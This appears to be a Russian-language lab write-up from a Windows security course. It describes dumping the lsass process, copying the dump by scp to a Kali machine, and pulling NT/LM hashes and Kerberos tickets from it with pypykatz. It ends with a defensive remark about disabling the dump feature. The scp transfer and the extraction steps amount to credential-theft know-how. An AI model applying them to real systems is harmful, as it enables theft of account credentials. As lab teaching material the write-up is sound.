## Занятие 3. ААА в Windows ### Практическая работа №3 ААА в Windows Нажимаем "создать файл дампа", он сохраниться здесь C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP ![](https://i.imgur.com/Qrszive.png) Т.к. я нажал несколько раз, создался уже третий дамп ![](https://i.imgur.com/uBw9kis.png) Файл /home/user в кали ![](https://i.imgur.com/y3ZFWwo.png) ![](https://i.imgur.com/vhAVapv.png) ![](https://i.imgur.com/WwUeJmi.png) Авторизовавшись под администртором захожу в командную строку и выполняю следующую команду scp C:\\Users\\ADMpetr\\AppData\\Local\\Temp\\lsass.DMP user@192.168.10.9:/home/user Видим, что на линуксе появился файл ![](https://i.imgur.com/firimOF.png) С помощью git clone https://github.com/skelsec/pypykatz скачиваем скрипт pypykatz ![](https://i.imgur.com/5g2YGXO.png) ![](https://i.imgur.com/3kDJuF6.png) Выполняем скачанный скрипт к файлу lsass.DMP ![](https://i.imgur.com/RvJMf7W.png) Процесс lsass.exe хранит в себе огромное количесвто конфиденциальной информации. На скриншоте видны NT и LM хеши, билеты протокола Kerberos, зашифрованные пароли. Чтобы сдампить процесс нужен доступ к локальному администратору. Дамп предусмотрен в Windows, поэтому безопаснее выключать эту возможность.